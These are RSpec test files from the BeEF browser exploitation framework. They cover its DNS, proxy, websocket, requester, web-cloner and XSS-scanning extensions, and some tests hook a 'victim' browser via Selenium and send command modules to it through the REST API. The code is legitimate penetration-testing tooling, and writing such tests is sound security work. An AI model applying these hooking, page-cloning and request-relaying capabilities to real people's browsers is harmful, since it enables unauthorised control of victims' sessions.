RSpec.describe 'BeEF BrowserDetails' do before(:all) do @session = (0...10).map { ('a'..'z').to_a[rand(26)] }.join end it 'set nil value' do BeEF::Core::Models::BrowserDetails.set(@session, 'key_with_nil_value', nil) expect(BeEF::Core::Models::BrowserDetails.get(@session, 'key_with_nil_value')).to be_empty end it 'set value' do key_name = (0...10).map { ('a'..'z').to_a[rand(26)] }.join key_value = (0...10).map { ('a'..'z').to_a[rand(26)] }.join BeEF::Core::Models::BrowserDetails.set(@session, key_name, key_value) expect(BeEF::Core::Models::BrowserDetails.get(@session, key_name)).to eql(key_value) end it 'update value' do key_name = (0...10).map { ('a'..'z').to_a[rand(26)] }.join original_key_value = (0...10).map { ('a'..'z').to_a[rand(26)] }.join BeEF::Core::Models::BrowserDetails.set(@session, key_name, original_key_value).to_s expect(BeEF::Core::Models::BrowserDetails.get(@session, key_name)).to eql(original_key_value) new_key_value = (0...10).map { ('a'..'z').to_a[rand(26)] }.join BeEF::Core::Models::BrowserDetails.set(@session, key_name, new_key_value).to_s expect(BeEF::Core::Models::BrowserDetails.get(@session, key_name)).to_not eql(original_key_value) expect(BeEF::Core::Models::BrowserDetails.get(@session, key_name)).to eql(new_key_value) end end
Ruby
beef/spec/beef/core/main/network_stack/handlers/dynamic_reconstruction_spec.rb
RSpec.describe 'BeEF Dynamic Reconsturction' do before(:all) do @port = 2001 config = {} config[:BindAddress] = '127.0.0.1' config[:Port] = @port.to_s @mounts = {} @mounts['/test'] = BeEF::Core::NetworkStack::Handlers::DynamicReconstruction.new @rackApp = Rack::URLMap.new(@mounts) Thin::Logging.silent = true @server = Thin::Server.new('127.0.0.1', @port.to_s, @rackApp) trap("INT") { @server.stop } trap("TERM") { @server.stop } @pid = fork do @server.start! end # wait for server to start sleep 1 end after(:all) do Process.kill("INT",@pid) end it 'delete' do response = Curl::Easy.http_delete("http://127.0.0.1:#{@port}/test") expect(response.response_code).to eql(404) end it 'put' do response = Curl::Easy.http_put("http://127.0.0.1:#{@port}/test", nil) expect(response.response_code).to eql(404) end it 'head' do response = Curl::Easy.http_head("http://127.0.0.1:#{@port}/test") expect(response.response_code).to eql(404) end context 'get' do it 'no params' do response = Curl::Easy.http_get("http://127.0.0.1:#{@port}/test") expect(response.response_code).to eql(404) end it 'zero values' do response = Curl::Easy.http_get("http://127.0.0.1:#{@port}/test?bh=0&sid=0&pid=0&pc=0&d=0") expect(response.response_code).to eql(200) expect(response.body_str).to be_empty end it 'one values' do response = Curl::Easy.http_get("http://127.0.0.1:#{@port}/test?bh=1&sid=1&pid=1&pc=1&d=1") expect(response.response_code).to eql(200) expect(response.body_str).to be_empty end it 'negative one values' do response = Curl::Easy.http_get("http://127.0.0.1:#{@port}/test?bh=-1&sid=-1&pid=-1&pc=-1&d=-1") expect(response.response_code).to eql(200) expect(response.body_str).to be_empty end # Fails gracefully it 'ascii values' do response = Curl::Easy.http_get("http://127.0.0.1:#{@port}/test?bh=z&sid=z&pid=z&pc=z&d=z") expect(response.response_code).to eql(200) expect(response.body_str).to be_empty end # Fails gracefully it 'array values' do response = Curl::Easy.http_get("http://127.0.0.1:#{@port}/test?bh[]=1&sid[]=1&pid[]=1&pc[]=1&d[]=1") expect(response.response_code).to eql(200) expect(response.body_str).to be_empty end end end
Ruby
beef/spec/beef/core/main/network_stack/handlers/redirector_spec.rb
RSpec.describe 'BeEF Redirector' do before(:all) do @port = 2002 config = {} config[:BindAddress] = '127.0.0.1' config[:Port] = @port.to_s @mounts = {} @mounts['/test'] = BeEF::Core::NetworkStack::Handlers::Redirector.new('http://www.beefproject.com') @rackApp = Rack::URLMap.new(@mounts) Thin::Logging.silent = true @server = Thin::Server.new('127.0.0.1', @port.to_s, @rackApp) trap("INT") { @server.stop } trap("TERM") { @server.stop } @pid = fork do @server.start! end # wait for server to start sleep 0.8 end after(:all) do Process.kill("INT",@pid) end it 'redirects' do response = Curl::Easy.http_get("http://127.0.0.1:#{@port}/test/") expect(response.response_code).to eql(302) expect(response.body_str).to eql("302 found") expect(response.header_str).to match(/Location: http:\/\/www.beefproject\.com/) end end
Ruby
beef/spec/beef/extensions/adminui_spec.rb
# # Tests for handling access to the Admin UI # require 'extensions/admin_ui/classes/httpcontroller' require 'extensions/admin_ui/classes/session' require 'extensions/admin_ui/controllers/authentication/authentication' RSpec.describe 'BeEF Extension AdminUI' do before(:all) do @session = BeEF::Extension::AdminUI::Session.instance @config = BeEF::Core::Configuration.instance end after(:all) do @config.set('beef.restrictions.permitted_ui_subnet',["0.0.0.0/0", "::/0"]) end it 'loads configuration' do expect(@config.get('beef.restrictions')).to have_key('permitted_ui_subnet') end it 'confirms that any ip address is permitted to view the admin ui' do ui = BeEF::Extension::AdminUI::HttpController.new expect(@config.set('beef.restrictions.permitted_ui_subnet',["0.0.0.0/0", "::/0"])).to eq true expect(ui.authenticate_request("8.8.8.8")).to eq true end it 'confirms that an ip address is permitted to view the admin ui' do ui = BeEF::Extension::AdminUI::HttpController.new expect(@config.set('beef.restrictions.permitted_ui_subnet',["192.168.10.1"])).to eq true expect(ui.authenticate_request("192.168.10.1")).to eq true end it 'confirms that an ip address is not permitted to view the admin ui' do ui = BeEF::Extension::AdminUI::HttpController.new expect(@config.set('beef.restrictions.permitted_ui_subnet',["10.10.10.1"])).to eq true expect(ui.authenticate_request("8.8.8.8")).to eq false end it 'confirms that X-Forwarded-For cant be spoofed when reverse proxy is disabled' do ui = BeEF::Extension::AdminUI::HttpController.new expect(@config.set('beef.restrictions.permitted_ui_subnet',["192.168.0.10"])).to eq true expect(@config.set('beef.http.allow_reverse_proxy',false)).to eq true env = { "REQUEST_METHOD" => "GET", "PATH_INFO" => "/ui/authentication" } request = Rack::Request.new(env) request.add_header("HTTP_X_FORWARDED_FOR","192.168.0.10") request.add_header("REMOTE_ADDR","192.168.0.20") expect(ui.get_ip(request)).to eq "192.168.0.20" end end
Ruby
beef/spec/beef/extensions/dns_spec.rb
require 'resolv' require 'extensions/dns/extension.rb' RSpec.describe 'BeEF Extension DNS' do IN = Resolv::DNS::Resource::IN before(:all) do @config = BeEF::Core::Configuration.instance @config.load_extensions_config @dns = BeEF::Extension::Dns::Server.instance end it 'loaded configuration' do config = @config.get('beef.extension.dns') expect(config).to have_key('protocol') expect(config).to have_key('address') expect(config).to have_key('port') expect(config).to have_key('upstream') end it 'responds to interfaces' do expect(@dns).to respond_to(:add_rule) expect(@dns).to respond_to(:get_rule) expect(@dns).to respond_to(:remove_rule!) expect(@dns).to respond_to(:get_ruleset) expect(@dns).to respond_to(:remove_ruleset!) end context 'add good rule' do it '1.2.3.4' do id = nil response = '1.2.3.4' expect { id = @dns.add_rule( :pattern => 'foo.bar', :resource => IN::A, :response => [response] ) do |transaction| transaction.respond!(response) end }.to_not raise_error expect(id).to_not be_nil end it '9.9.9.9' do id = nil response = '9.9.9.9' expect { id = @dns.add_rule( :pattern => %r{i\.(love|hate)\.beef\.com?}, :resource => IN::A, :response => [response] ) do |transaction| transaction.respond!(response) end }.to_not raise_error expect(id).to_not be_nil end it 'domains' do response = '9.9.9.9' domains = %w( i.hate.beef.com i.love.beef.com i.love.beef.co i.love.beef.co ) domains.each do |d| id = nil expect { id = @dns.add_rule( :pattern => %r{i\.(love|hate)\.beef\.com?}, :resource => IN::A, :response => [response] ) do |transaction| transaction.respond!(response) end }.to_not raise_error expect(id).to_not be_nil end end context 'add bad rule' do it '4.2.4.2' do id = nil same_id = nil pattern = 'j.random.hacker' response = '4.2.4.2' expect { id = @dns.add_rule( :pattern => pattern, :resource => IN::A, :response => [response] ) do |transaction| transaction.respond!(response) end }.to_not raise_error expect { same_id = @dns.add_rule( :pattern => pattern, :resource => IN::A, :response => [response] ) do |transaction| transaction.respond!(response) end }.to_not raise_error expect { same_id = @dns.add_rule( :pattern => pattern, :resource => IN::A, :response => [response] ) do |transaction| transaction.respond!(response) end }.to_not raise_error expect(id).to eql(same_id) end end end # it 'id format' do # pattern = 'dead.beef' # response = '2.2.2.2' # id = nil # expect { # id = @dns.add_rule( # :pattern => pattern, # :resource => IN::A, # :response => [response] ) do |transaction| # transaction.respond!(response) # end # }.to_not raise_error # expect(id.length).to eql(8) # expect(id).to match(/^\h{8}$/) # end it 'get good rule' do pattern = 'be.ef' response = '1.1.1.1' id = nil expect { id = @dns.add_rule( :pattern => pattern, :resource => IN::A, :response => [response] ) do |transaction| transaction.respond!(response) end }.to_not raise_error expect(id).to_not be_nil rule = @dns.get_rule(id) expect(rule).to be_a(Hash) expect(rule.length).to be > 0 expect(rule).to have_key(:id) expect(rule).to have_key(:pattern) expect(rule).to have_key(:resource) expect(rule).to have_key(:response) expect(rule[:id]).to eql(id) expect(rule[:pattern]).to eql(pattern) expect(rule[:resource]).to eql('A') expect(rule[:response]).to be_a(Array) expect(rule[:response].length).to be > 0 expect(rule[:response].first).to eql(response) end it 'get bad rule' do expect(@dns.get_rule(42)).to be_nil end it 'remove good rule' do pattern = 'hack.the.gibson' response = '1.9.9.5' id = nil expect { id = @dns.add_rule( :pattern => pattern, :resource => IN::A, :response => [response] ) do |transaction| transaction.respond!(response) end }.to_not raise_error expect(@dns.remove_rule!(id)).to be(true) end it 'remove bad rule' do expect(@dns.remove_rule!(42)).to be_nil end it 'get ruleset' do rules = [ { pattern: 'be.ef', resource: 'Resolv::DNS::Resource::IN::A', response: ['1.1.1.1'] }, { pattern: 'dead.beef', resource: 'Resolv::DNS::Resource::IN::A', response: ['2.2.2.2'] }, { pattern: 'foo.bar', resource: 'Resolv::DNS::Resource::IN::A', response: ['1.2.3.4'] }, { pattern: 'i\.(love|hate)\.beef.com?', resource: 'Resolv::DNS::Resource::IN::A', response: ['9.9.9.9'] }, { pattern: 'j.random.hacker', resource: 'Resolv::DNS::Resource::IN::A', response: ['4.2.4.2'] } ] @dns.remove_ruleset! expect(@dns.get_ruleset.length).to eql(0) rules.each do |r| @dns.add_rule( :pattern => r[:pattern], :resource => IN::A, :response => r[:response] ) end ruleset = @dns.get_ruleset #ruleset.sort! { |a, b| a[:pattern] <=> b[:pattern] } expect(ruleset.length).to eql(5) rules.each_with_index do |v,i| expect(ruleset[i][:pattern]).to eql(v[:pattern]) expect(ruleset[i][:resource]).to eql(v[:resource]) expect(ruleset[i][:response]).to eql(v[:response]) end end it 'remove ruleset' do expect(@dns.remove_ruleset!).to be(true) expect(@dns.get_ruleset.length).to eql(0) end it 'failure types' do end end # Tests each supported type of query failure # def test_13_failure_types # begin # id = @@dns.add_rule( # :pattern => 'noerror.beef.com', # :resource => IN::A, # :response => ['1.2.3.4'] ) do |transaction| # transaction.failure!(:NoError) # end # #check_failure_status(id, :NoError) # end # # begin # id = @@dns.add_rule( # :pattern => 'formerr.beef.com', # :resource => IN::A, # :response => ['1.2.3.4'] ) do |transaction| # transaction.failure!(:FormErr) # end ## #check_failure_status(id, :FormErr) # end # # begin # id = @@dns.add_rule( # :pattern => 'servfail.beef.com', # :resource => IN::A, # :response => ['1.2.3.4'] ) do |transaction| # transaction.failure!(:ServFail) # end # #check_failure_status(id, :ServFail) # end # # begin # id = @@dns.add_rule( # :pattern => 'nxdomain.beef.com', # :resource => IN::A, # :response => ['1.2.3.4'] ) do |transaction| # transaction.failure!(:NXDomain) # end # #check_failure_status(id, :NXDomain) # end # # begin # id = @@dns.add_rule( # :pattern => 'notimp.beef.com', # :resource => IN::A, ## :response => ['1.2.3.4'] ) do |transaction| # transaction.failure!(:NotImp) # end # #check_failure_status(id, :NotImp) # end # # begin # id = @@dns.add_rule( # :pattern => 'refused.beef.com', # :resource => IN::A, # :response => ['1.2.3.4'] ) do |transaction| ### transaction.failure!(:Refused) # end # #check_failure_status(id, :Refused) # end # # begin # id = @@dns.add_rule( # :pattern => 'notauth.beef.com', # :resource => IN::A, # :response => ['1.2.3.4'] ) do |transaction| # transaction.failure!(:NotAuth) # end ## #check_failure_status(id, :NotAuth) # end # end # ## private ## # # Confirms that a query for the rule given in 'id' returns a 'resource' failure status ## def check_failure_status(id, resource) ## rule = @@dns.get_rule(id) # status = resource.to_s.force_encoding('UTF-8').upcase # assert_equal(status, rule[:response][0]) # # check_dns_response(/status: #{status}/, rule[:resource], rule[:pattern]) # end # # # Compares output of dig command against regex # def check_dns_response(regex, type, pattern) # address = @@config.get('beef.extension.dns.address') # port = @@config.get('beef.extension.dns.port') ### dig_output = IO.popen(["dig", "@#{address}", "-p", "#{port}", "-t", "#{type}", "#{pattern}"], 'r+').read # assert_match(regex, dig_output) # end ## ##end ###
Ruby
beef/spec/beef/extensions/network_spec.rb
require 'extensions/network/models/network_service' require 'extensions/network/models/network_host' RSpec.describe 'BeEF Extension Network' do it 'add good local host' do expect { BeEF::Core::Models::NetworkHost.create(:hooked_browser_id => '1234', :ip => '127.0.0.1') }.to_not raise_error expect(BeEF::Core::Models::NetworkHost.where(hooked_browser_id: '1234', ip: '127.0.0.1')).to_not be_empty end it 'add good not local host' do expect { BeEF::Core::Models::NetworkHost.create(:hooked_browser_id => '12', :ip => '192.168.1.2') }.to_not raise_error expect(BeEF::Core::Models::NetworkHost.where(hooked_browser_id: '12', ip: '192.168.1.2')).to_not be_empty end it 'add good service' do expect { BeEF::Core::Models::NetworkService.create(:hooked_browser_id => '1234', :proto => 'http', :ip => '127.0.0.1', :port => 80, :ntype => 'Apache') }.to_not raise_error expect(BeEF::Core::Models::NetworkService.where(hooked_browser_id: '1234', ip: '127.0.0.1')).to_not be_empty end end
Ruby
beef/spec/beef/extensions/proxy_spec.rb
require 'extensions/proxy/extension' RSpec.describe 'BeEF Extension Proxy' do before(:all) do @config = BeEF::Core::Configuration.instance @config.load_extensions_config end it 'loads configuration' do config = @config.get('beef.extension.proxy') expect(config).to have_key('enable') expect(config).to have_key('address') expect(config).to have_key('port') expect(config).to have_key('key') expect(config).to have_key('cert') end end
Ruby
beef/spec/beef/extensions/qrcode_spec.rb
require 'extensions/qrcode/extension' RSpec.describe 'BeEF Extension QRCode' do before(:all) do @config = BeEF::Core::Configuration.instance @config.load_extensions_config end it 'loads configuration' do config = @config.get('beef.extension.qrcode') expect(config).to have_key('enable') expect(config).to have_key('targets') expect(config).to have_key('qrsize') expect(config).to have_key('qrborder') end end
Ruby
beef/spec/beef/extensions/requester_spec.rb
require 'extensions/requester/extension' RSpec.describe 'BeEF Extension Requester' do before(:all) do @config = BeEF::Core::Configuration.instance @config.load_extensions_config end it 'loads configuration' do expect(@config.get('beef.extension.requester')).to have_key('enable') end it 'has interface' do requester = BeEF::Extension::Requester::API::Hook.new expect(requester).to respond_to(:requester_run) expect(requester).to respond_to(:add_to_body) expect(requester).to respond_to(:requester_parse_db_request) end # default skipped because browser hooking not working properly in travis-CI xit 'requester works' do # start beef server @config = BeEF::Core::Configuration.instance @config.set('beef.credentials.user', "beef") @config.set('beef.credentials.passwd', "beef") #generate api token BeEF::Core::Crypto::api_token # load up DB # Connect to DB ActiveRecord::Base.logger = nil OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')] OTR::ActiveRecord.configure_from_hash!(adapter:'sqlite3', database:'beef.db') # otr-activerecord require you to manually establish the connection with the following line #Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems. if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2') OTR::ActiveRecord.establish_connection! end # Migrate (if required) context = ActiveRecord::Migration.new.migration_context if context.needs_migration? puts "migrating db" ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate end http_hook_server = BeEF::Core::Server.instance http_hook_server.prepare @pids = fork do BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) end @pid = fork do http_hook_server.start end # wait for server to start sleep 1 https = BeEF::Core::Models::Http ### hook a new victim, use rest API to send request ########### api = BeefRestClient.new('http', ATTACK_DOMAIN, '3000', BEEF_USER, BEEF_PASSWD) response = api.auth() @token = response[:token] puts "authenticated. api token: #{@token}" response = RestClient.get "#{RESTAPI_HOOKS}", {:params => {:token => @token}} puts "hooks response: #{response}" hb_details = JSON.parse(response.body) puts "hb_details is empty: #{hb_details.empty?}" while hb_details["hooked-browsers"]["online"].empty? # get victim session response = RestClient.get "#{RESTAPI_HOOKS}", {:params => {:token => @token}} puts "hooks response: #{response}" hb_details = JSON.parse(response.body) puts "json: #{hb_details}" puts "online hooked browsers empty: #{hb_details["hooked-browsers"]["online"].empty?}" end hb_session = hb_details["hooked-browsers"]["online"]["0"]["session"] puts "hooked browser: #{hb_session}" # clear all previous victim requests cleared = https.where(:hooked_browser_id => hb_session).delete_all puts "cleared #{cleared} previous request entries" # send a random request to localhost port 3000 randreq = (0...8).map { (65 + rand(26)).chr }.join response = RestClient.post "#{RESTAPI_REQUESTER}/send/#{hb_session}?token=#{@token}", "proto=http&raw_request=GET%20%2Ftest#{randreq}%20HTTP%2F1.1%0AHost%3A%20localhost%3A3000%0A" sleep 0.5 sent_request = RestClient.get "#{RESTAPI_REQUESTER}/requests/#{hb_session}?token=#{@token}" puts "request sent: #{sent_request.to_json}" sent_request = JSON.parse(sent_request) reqid = sent_request["requests"][0]["id"] puts "getting response for id #{reqid}" response = RestClient.get "#{RESTAPI_REQUESTER}/response/#{reqid}?token=#{@token}" expect(response) ############################################################### # cleanup: delete test browser entries https.where(:hooked_browser_id => hb_session).delete_all # kill the server Process.kill('KILL', @pid) Process.kill('KILL', @pids) puts "waiting for server to die.." sleep 1 end end
Ruby
beef/spec/beef/extensions/social_engineering_spec.rb
require 'extensions/social_engineering/models/web_cloner' require 'extensions/social_engineering/web_cloner/web_cloner' require 'extensions/social_engineering/web_cloner/interceptor' require 'extensions/social_engineering/models/interceptor' require 'fileutils' RSpec.describe 'BeEF Extension Social Engineering' do it 'persistence web cloner' do expect { BeEF::Core::Models::WebCloner.create(uri: "example.com", mount: "/") }.to_not raise_error end xit 'clone web page' do expect { BeEF::Core::Server.instance.prepare BeEF::Extension::SocialEngineering::WebCloner.instance.clone_page("https://www.google.com", "/", nil, nil) }.to_not raise_error FileUtils.rm(Dir['./extensions/social_engineering/web_cloner/cloned_pages/www.google.com']) FileUtils.rm(Dir['./extensions/social_engineering/web_cloner/cloned_pages/www.google.com_mod']) end end
Ruby
beef/spec/beef/extensions/webrtc_spec.rb
require 'rest-client' RSpec.describe 'BeEF Extension WebRTC' do before(:all) do @config = BeEF::Core::Configuration.instance @config.load_extensions_config # json = {:username => BEEF_USER, :password => BEEF_PASSWD}.to_json # @headers = {:content_type => :json, :accept => :json} # response = RestClient.post("#{RESTAPI_ADMIN}/login", json, @headers) # result = JSON.parse(response.body) # @token = result['token'] # @activated = @config.get('beef.extension.webrtc.enable') || false # @victim1 = BeefTest.new_victim # @victim2 = BeefTest.new_victim # sleep 8 # # Fetch last online browsers' ids # rest_response = RestClient.get "#{RESTAPI_HOOKS}", {:params => { :token => @token}} # result = JSON.parse(rest_response.body) # browsers = result["hooked-browsers"]["online"] # browsers.each_with_index do |elem, index| # if index == browsers.length - 1 # @victim2id = browsers["#{index}"]["id"].to_s # end # if index == browsers.length - 2 # @victim1id = browsers["#{index}"]["id"].to_s # end # end end after(:all) do # @victim1.driver.browser.close unless @victim1.nil? # @victim2.driver.browser.close unless @victim2.nil? end it 'loads configuration' do config = @config.get('beef.extension.webrtc') expect(config).to have_key('enable') expect(config).to have_key('stunservers') expect(config).to have_key('turnservers') end # it 'check two hooked browsers' do # expect(@activated).to be(true) # response = nil # expect { # response = RestClient.get "#{RESTAPI_HOOKS}", {:params => {:token => @token}} # }.to_not raise_error # expect(response).to_not be_nil # expect(response.body).to_not be_nil # expect(response.code).to eql(200) # result = JSON.parse(rest_response.body) # browsers = result["hooked-browsers"]["online"] # expect(browsers).to_not be_nil # expect(browsers.length).to be >= 2 # end end
Ruby
beef/spec/beef/extensions/websocket_hooked_browser_spec.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # require 'rest-client' require 'json' require_relative '../../spec_helper' require_relative '../../support/constants' require_relative '../../support/beef_test' require 'core/main/network_stack/websocket/websocket' require 'websocket-client-simple' RSpec.describe 'Browser hooking with Websockets', run_on_browserstack: true do before(:all) do @config = BeEF::Core::Configuration.instance # Grab DB file and regenerate if requested print_info 'Loading database' db_file = @config.get('beef.database.file') print_info 'Resetting the database for BeEF.' File.delete(db_file) if File.exist?(db_file) @config.set('beef.credentials.user', 'beef') @config.set('beef.credentials.passwd', 'beef') @config.set('beef.http.websocket.secure', false) @config.set('beef.http.websocket.enable', true) @ws = BeEF::Core::Websocket::Websocket.instance @username = @config.get('beef.credentials.user') @password = @config.get('beef.credentials.passwd') # Load BeEF extensions and modules # Always load Extensions, as previous changes to the config from other tests may affect # whether or not this test passes. print_info 'Loading in BeEF::Extensions' BeEF::Extensions.load # Check if modules already loaded. No need to reload. if @config.get('beef.module').nil? print_info 'Loading in BeEF::Modules' BeEF::Modules.load else print_info 'Modules already loaded' end # Load up DB and migrate if necessary ActiveRecord::Base.logger = nil OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')] OTR::ActiveRecord.configure_from_hash!(adapter: 'sqlite3', database: db_file) # otr-activerecord require you to manually establish the connection with the following line #Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems. if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2') OTR::ActiveRecord.establish_connection! end context = ActiveRecord::Migration.new.migration_context ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate if context.needs_migration? BeEF::Core::Migration.instance.update_db! # Spawn HTTP Server print_info 'Starting HTTP Hook Server' http_hook_server = BeEF::Core::Server.instance http_hook_server.prepare # Generate a token for the server to respond with @token = BeEF::Core::Crypto.api_token # Initiate server start-up @pids = fork do BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) end @pid = fork do http_hook_server.start end begin @caps = CONFIG['common_caps'].merge(CONFIG['browser_caps'][TASK_ID]) @caps['name'] = self.class.description || ENV['name'] || 'no-name' @caps['browserstack.local'] = true @caps['browserstack.localIdentifier'] = ENV['BROWSERSTACK_LOCAL_IDENTIFIER'] @driver = Selenium::WebDriver.for(:remote, url: "http://#{CONFIG['user']}:#{CONFIG['key']}@#{CONFIG['server']}/wd/hub", desired_capabilities: @caps) # Hook new victim print_info 'Hooking a new victim, waiting a few seconds...' wait = Selenium::WebDriver::Wait.new(timeout: 30) # seconds @driver.navigate.to VICTIM_URL.to_s sleep 3 sleep 1 until wait.until { @driver.execute_script('return window.beef.session.get_hook_session_id().length') > 0 } @session = @driver.execute_script('return window.beef.session.get_hook_session_id().length') rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else exit 0 end end end after(:all) do server_teardown(@driver, @pid, @pids) end it 'confirms a websocket server has been started' do expect(@ws).to be_a_kind_of(BeEF::Core::Websocket::Websocket) end it 'confirms a secure websocket server has been started' do @config.set('beef.http.websocket.secure', true) wss = BeEF::Core::Websocket::Websocket.instance expect(wss).to be_a_kind_of(BeEF::Core::Websocket::Websocket) end it 'can successfully hook a browser' do expect(@session).not_to be_nil rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.stacktrace}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else expect(BeEF::Filters.is_valid_hook_session_id?(@driver.execute_script('return window.beef.session.get_hook_session_id()'))).to eq true end end end
Ruby
beef/spec/beef/extensions/websocket_spec.rb
require 'rest-client' require 'core/main/network_stack/websocket/websocket' require 'websocket-client-simple' RSpec.describe 'BeEF Extension WebSockets' do before(:all) do @config = BeEF::Core::Configuration.instance @cert_key = @config.get('beef.http.https.key') @cert = @config.get('beef.http.https.cert') @port = @config.get('beef.http.websocket.port') @secure_port = @config.get('beef.http.websocket.secure_port') @config.set('beef.http.websocket.secure', false) @ws = BeEF::Core::Websocket::Websocket.instance end after(:all) do @config.set('beef.http.websocket.secure', true) end it 'confirms that a websocket server has been started' do expect(@ws).to be_a_kind_of(BeEF::Core::Websocket::Websocket) end it 'confirms that a secure websocket server has been started' do @config.set('beef.http.websocket.secure', true) wss = BeEF::Core::Websocket::Websocket.instance expect(wss).to be_a_kind_of(BeEF::Core::Websocket::Websocket) end it 'confirms that a websocket client can connect to the BeEF Websocket Server' do sleep(3) client = WebSocket::Client::Simple.connect "ws://127.0.0.1:#{@port}" sleep(1) expect(client).to be_a_kind_of(WebSocket::Client::Simple::Client) expect(client.open?).to be true client.close end end
Ruby
beef/spec/beef/extensions/xssrays_spec.rb
require 'extensions/xssrays/extension' RSpec.describe 'BeEF Extension XSSRays' do before(:all) do @config = BeEF::Core::Configuration.instance @config.load_extensions_config end it 'loads configuration' do config = @config.get('beef.extension.xssrays') expect(config).to have_key('enable') expect(config).to have_key('clean_timeout') expect(config).to have_key('cross_domain') end it 'interface' do xssrays = BeEF::Extension::Xssrays::API::Scan.new expect(xssrays).to respond_to(:start_scan) expect(xssrays).to respond_to(:add_to_body) end end
Ruby
beef/spec/beef/modules/debug/test_beef_debugs_spec.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # require 'rest-client' require 'json' require_relative '../../../spec_helper' require_relative '../../../support/constants' require_relative '../../../support/beef_test' RSpec.describe 'BeEF Debug Command Modules:', run_on_browserstack: true do before(:all) do # Grab config and set creds in variables for ease of access @config = BeEF::Core::Configuration.instance # Grab DB file and regenerate if requested print_info 'Loading database' db_file = @config.get('beef.database.file') print_info 'Resetting the database for BeEF.' File.delete(db_file) if File.exist?(db_file) @username = @config.get('beef.credentials.user') @password = @config.get('beef.credentials.passwd') # Load BeEF extensions and modules # Always load Extensions, as previous changes to the config from other tests may affect # whether or not this test passes. print_info 'Loading in BeEF::Extensions' BeEF::Extensions.load # Check if modules already loaded. No need to reload. if @config.get('beef.module').nil? print_info 'Loading in BeEF::Modules' BeEF::Modules.load else print_info 'Modules already loaded' end # Load up DB and migrate if necessary ActiveRecord::Base.logger = nil OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')] OTR::ActiveRecord.configure_from_hash!(adapter: 'sqlite3', database: db_file) # otr-activerecord require you to manually establish the connection with the following line #Also a check to confirm that the correct Gem version is installed to require it, likely easier for old systems. if Gem.loaded_specs['otr-activerecord'].version > Gem::Version.create('1.4.2') OTR::ActiveRecord.establish_connection! end context = ActiveRecord::Migration.new.migration_context ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate if context.needs_migration? BeEF::Core::Migration.instance.update_db! # Spawn HTTP Server print_info 'Starting HTTP Hook Server' http_hook_server = BeEF::Core::Server.instance http_hook_server.prepare # Generate a token for the server to respond with @token = BeEF::Core::Crypto.api_token # Initiate server start-up @pids = fork do BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) end @pid = fork do http_hook_server.start end begin @caps = CONFIG['common_caps'].merge(CONFIG['browser_caps'][TASK_ID]) @caps['name'] = self.class.description || ENV['name'] || 'no-name' @caps['browserstack.local'] = true @caps['browserstack.localIdentifier'] = ENV['BROWSERSTACK_LOCAL_IDENTIFIER'] @driver = Selenium::WebDriver.for(:remote, url: "http://#{CONFIG['user']}:#{CONFIG['key']}@#{CONFIG['server']}/wd/hub", desired_capabilities: @caps) # Hook new victim print_info 'Hooking a new victim, waiting a few seconds...' wait = Selenium::WebDriver::Wait.new(timeout: 30) # seconds @driver.navigate.to VICTIM_URL.to_s sleep 1 sleep 1 until wait.until { @driver.execute_script('return window.beef.session.get_hook_session_id().length') > 0 } @session = @driver.execute_script('return window.beef.session.get_hook_session_id()') # Grab Command Module IDs as they can differ from machine to machine @debug_mod_ids = JSON.parse(RestClient.get("#{RESTAPI_MODULES}?token=#{@token}")) @debug_mod_names_ids = {} @debug_mods = @debug_mod_ids.to_a.select { |cmd_mod| cmd_mod[1]['category'] == 'Debug' } .map do |debug_mod| @debug_mod_names_ids[debug_mod[1]['class']] = debug_mod[1]['id'] end rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else exit 0 end end end after(:all) do server_teardown(@driver, @pid, @pids) end it 'The Test_beef.debug() command module successfully executes' do cmd_mod_id = @debug_mod_names_ids['Test_beef_debug'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", { "msg": 'test' }.to_json, content_type: :json result_data = JSON.parse(response.body) expect(result_data['success']).to eq 'true' rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else exit 0 end end it 'The Return ASCII Characters command module successfully executes' do cmd_mod_id = @debug_mod_names_ids['Test_return_ascii_chars'] response = RestClient.post "#{RESTAPI_MODULES}/#{@session}/#{cmd_mod_id}?token=#{@token}", {}.to_json, content_type: :json result_data = JSON.parse(response.body) expect(result_data['success']).to eq 'true' rescue StandardError => e print_info "Exception: #{e}" print_info "Exception Class: #{e.class}" print_info "Exception Message: #{e.message}" print_info "Exception Stack Trace: #{e.backtrace}" if @driver.execute_script('return window.beef.session.get_hook_session_id().length').nil? exit 1 else exit 0 end end it 'The Return Image command module successfully executes' do cmd_mod_id = 